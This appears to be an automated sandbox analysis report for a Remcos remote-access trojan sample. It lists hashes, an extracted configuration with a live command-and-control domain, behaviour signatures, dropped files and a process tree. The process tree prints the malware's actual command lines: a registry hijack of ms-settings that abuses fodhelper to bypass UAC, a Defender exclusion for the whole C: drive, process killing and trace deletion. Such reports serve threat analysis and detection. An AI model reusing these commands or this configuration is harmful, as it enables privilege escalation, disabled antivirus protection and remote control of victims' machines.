Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    26-07-2024 06:45

General

  • Target

    e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe

  • Size

    1.1MB

  • MD5

    2d655119c0aa977debf88758f2009729

  • SHA1

    40c98ca63e9f78284cddbefddc03b6c6ad070462

  • SHA256

    e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9

  • SHA512

    fe96ee94b8c57c76650288eb589eb41b0430ea45597d025c1ecead87cafd75d5bb58204999ca78f736f54b26b247959d079a498784bdcb274bc159fcc4b395c8

  • SSDEEP

    24576:Edd+fYkdMwkRdF36Xq5W2xnXuWmStY6mATIU:EHkvXqE2NXufB6Xv

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

127.0.0.1:45645

127.0.0.1:56765

latestgrace2024.duckdns.org:56765

latestgrace2024.duckdns.org:45645

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-2ZXBPR

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 7 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 3 IoCs
  • Modifies registry class 5 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe
    "C:\Users\Admin\AppData\Local\Temp\e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2472
    • C:\Users\Public\Libraries\ioeztdcY.pif
      C:\Users\Public\Libraries\ioeztdcY.pif
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7A6D.tmp\7A7E.tmp\7A7F.bat C:\Users\Public\Libraries\ioeztdcY.pif"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2984
        • C:\Windows\System32\extrac32.exe
          C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
          4⤵
            PID:2460
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
            4⤵
            • Executes dropped EXE
            PID:2524
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
            4⤵
            • Executes dropped EXE
            PID:2544
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2596
            • C:\Windows\system32\extrac32.exe
              extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              5⤵
                PID:2988
            • C:\Users\Public\alpha.exe
              C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2156
              • C:\Windows\system32\extrac32.exe
                extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
                5⤵
                  PID:780
              • C:\Users\Public\alpha.exe
                C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
                4⤵
                • Executes dropped EXE
                • System Network Configuration Discovery: Internet Connection Discovery
                • Suspicious use of WriteProcessMemory
                PID:2508
                • C:\Windows\system32\PING.EXE
                  ping 127.0.0.1 -n 2
                  5⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:1580
              • C:\Windows\system32\cmd.exe
                cmd.exe
                4⤵
                  PID:1204
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:2624
                  • C:\Windows\system32\extrac32.exe
                    extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
                    5⤵
                      PID:2832
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2856
                    • C:\Users\Public\xkn.exe
                      C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:2820
                      • C:\Users\Public\alpha.exe
                        "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1820
                        • C:\Users\Public\ger.exe
                          C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
                          7⤵
                          • Executes dropped EXE
                          • Modifies registry class
                          PID:1808
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:852
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM SystemSettings.exe
                      5⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:676
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
                    4⤵
                    • Executes dropped EXE
                    PID:2860
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM SystemSettingsAdminFlows.exe
                      5⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1508
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
                    4⤵
                    • Executes dropped EXE
                    • System Network Configuration Discovery: Internet Connection Discovery
                    PID:1684
                    • C:\Windows\system32\PING.EXE
                      ping 127.0.0.1 -n 2
                      5⤵
                      • System Network Configuration Discovery: Internet Connection Discovery
                      • Runs ping.exe
                      PID:1676
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
                    4⤵
                    • Executes dropped EXE
                    PID:1328
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                    4⤵
                    • Executes dropped EXE
                    PID:2108
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                    4⤵
                    • Executes dropped EXE
                    PID:2104
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
                    4⤵
                    • Executes dropped EXE
                    PID:2404
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                    4⤵
                    • Executes dropped EXE
                    PID:2492
                  • C:\Users\Public\alpha.exe
                    C:\\Users\\Public\\alpha /c taskkill /F /IM cmd.exe
                    4⤵
                    • Executes dropped EXE
                    PID:2236
                    • C:\Windows\system32\taskkill.exe
                      taskkill /F /IM cmd.exe
                      5⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2320
              • C:\Windows\SysWOW64\extrac32.exe
                C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Local\Temp\e831a72bf963f6c0791f0592fe5015efb6898c6c07c35db5383b1f334c3814f9.exe C:\\Users\\Public\\Libraries\\Ycdtzeoi.PIF
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2200
              • C:\Windows\SysWOW64\colorcpl.exe
                C:\Windows\System32\colorcpl.exe
                2⤵
                • System Location Discovery: System Language Discovery
                PID:2388

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\remcos\logs.dat

              Filesize

              146B

              MD5

              057629f16ff66427bdf7566aef2cf752

              SHA1

              a12a7c935419d4d2f9f50fc4372a2808ec327a5e

              SHA256

              e69924030d1740287ba66ea1c372a383d7ecdff0c4fc6d3a1a6c24fa30cc8b83

              SHA512

              b73b9496ca918d7f1dd25ca56162a661e7611eebae115c082d71ca89090bd67f7d66de47cc963cc335532cb6811bb4b6c7a83e1def6d5837db12b1a355b50959

            • C:\Users\Admin\AppData\Local\Temp\7A6D.tmp\7A7E.tmp\7A7F.bat

              Filesize

              1KB

              MD5

              54147a112fd4c4fffbdeb2eeab926f59

              SHA1

              7f4ae3d3dd6202e47bc02438a947065c7ed115a9

              SHA256

              b040ccd004e2e55f8ad1b022388bbcc72eefd37f122ec2c5ef1601ecabd7dc46

              SHA512

              20c214b5efb1c70df2704fb487d9ba4fddbc87e1e295d9b7320ce1617f532dc0fd814a016f91ae161ba506a20dcbcea337c6bbec74edb71824035334608b2488

            • C:\Users\Admin\AppData\Local\Temp\Cab7551.tmp

              Filesize

              70KB

              MD5

              49aebf8cbd62d92ac215b2923fb1b9f5

              SHA1

              1723be06719828dda65ad804298d0431f6aff976

              SHA256

              b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

              SHA512

              bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

            • C:\Users\Admin\AppData\Local\Temp\Tar75B2.tmp

              Filesize

              181KB

              MD5

              4ea6026cf93ec6338144661bf1202cd1

              SHA1

              a1dec9044f750ad887935a01430bf49322fbdcb7

              SHA256

              8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

              SHA512

              6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

            • C:\Users\Public\xkn.exe

              Filesize

              462KB

              MD5

              852d67a27e454bd389fa7f02a8cbe23f

              SHA1

              5330fedad485e0e4c23b2abe1075a1f984fde9fc

              SHA256

              a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

              SHA512

              327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

            • \Users\Public\Libraries\ioeztdcY.pif

              Filesize

              66KB

              MD5

              c116d3604ceafe7057d77ff27552c215

              SHA1

              452b14432fb5758b46f2897aeccd89f7c82a727d

              SHA256

              7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

              SHA512

              9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

            • \Users\Public\alpha.exe

              Filesize

              337KB

              MD5

              5746bd7e255dd6a8afa06f7c42c1ba41

              SHA1

              0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

              SHA256

              db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

              SHA512

              3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

            • \Users\Public\ger.exe

              Filesize

              73KB

              MD5

              9d0b3066fe3d1fd345e86bc7bcced9e4

              SHA1

              e05984a6671fcfecbc465e613d72d42bda35fd90

              SHA256

              4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e

              SHA512

              d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119

            • memory/2388-110-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-122-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-157-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-150-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-151-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-148-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-149-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-147-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-146-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-107-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-112-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-111-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-140-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-106-0x0000000002D30000-0x0000000003D30000-memory.dmp

              Filesize

              16.0MB

            • memory/2388-114-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-116-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-117-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-139-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-123-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-134-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-128-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-130-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-131-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2388-133-0x0000000002C10000-0x0000000002C92000-memory.dmp

              Filesize

              520KB

            • memory/2472-1-0x0000000000220000-0x0000000000221000-memory.dmp

              Filesize

              4KB

            • memory/2472-0-0x0000000000220000-0x0000000000221000-memory.dmp

              Filesize

              4KB

            • memory/2472-2-0x0000000000400000-0x0000000000527000-memory.dmp

              Filesize

              1.2MB

            • memory/2784-47-0x0000000000400000-0x0000000001400000-memory.dmp

              Filesize

              16.0MB

            • memory/2784-97-0x0000000000400000-0x0000000001400000-memory.dmp

              Filesize

              16.0MB

            • memory/2784-99-0x0000000000400000-0x000000000041A000-memory.dmp

              Filesize

              104KB

            • memory/2784-48-0x0000000000400000-0x000000000041A000-memory.dmp

              Filesize

              104KB

            • memory/2784-45-0x0000000000400000-0x0000000001400000-memory.dmp

              Filesize

              16.0MB

            • memory/2820-79-0x00000000025D0000-0x00000000025D8000-memory.dmp

              Filesize

              32KB

            • memory/2820-78-0x000000001AFA0000-0x000000001B282000-memory.dmp

              Filesize

              2.9MB